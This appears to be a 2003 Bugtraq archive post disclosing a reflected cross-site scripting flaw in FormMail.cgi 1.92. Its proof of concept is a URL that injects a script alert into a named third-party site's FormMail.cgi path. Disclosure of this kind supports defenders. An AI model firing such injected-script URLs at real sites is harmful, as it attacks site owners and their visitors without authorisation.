Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

XSS (Cross Site Scripting) on FormMail.CGI

From: Rynho Zeros Web <hackargentino () gmx net>
Date: Sat, 11 Jan 2003 17:50:26 +0100 (MET)
#############################################################
 
 Topic:        XSS (Cross Site Scripting) on FormMail.CGI  
 Version:      1.92                                        
 Released:     April 21, 2002                              
 Manufacturer: http://www.scriptarchive.com/formmail.html  
 
 By XyborG - xyborg () bigfoot com - http://www.rzweb.com.ar/
 
#############################################################
 

Formmai.cgi, it is a utility that serves to send forms by email, among other
uses.
 
The operation is simple.  To see example:


http://www.l-c-u.com.ar/cgi-sys/FormMail.cgi?<script>alert("<center>Sorry,this\nis\nthe\nsecurity\nsite?\nNo_lo_Creo\n\nCyervo_Lamos...");</script>
 
Duh!

#############################################################
 
 Topic:        XSS (Cross Site Scripting) on FormMail.CGI  
 Version:      1.92                                        
 Released:     April 21, 2002                              
 Manufacturer: http://www.scriptarchive.com/formmail.html  
 
 By XyborG - xyborg () bigfoot com - http://www.rzweb.com.ar/
 
#############################################################

-- 
XyBØrG
WebMaster de:
www.RZW.com.ar
Powered By Dattatec.Com

+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
NEU: Mit GMX ins Internet. Rund um die Uhr für 1 ct/ Min. surfen!
Previous By Date Next
Previous By Thread Next

Current thread: